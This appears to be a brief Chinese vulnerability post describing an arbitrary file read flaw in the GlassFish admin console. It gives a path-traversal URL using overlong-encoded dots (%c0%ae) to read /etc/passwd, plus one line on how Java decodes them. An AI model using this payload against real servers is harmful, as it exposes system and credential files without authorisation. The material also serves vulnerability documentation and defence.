应用服务器glassfish任意文件读取漏洞
一、详细说明:其中包括情报涉及的人员、利用点、利用方式等
漏洞详情:
1 |
http: //localhost :4848 /theme/META-INF/ %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae /etc/passwd
|
---|
????????java语音中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."(点)。
二、问题证明:
昵称
邮箱
最新评论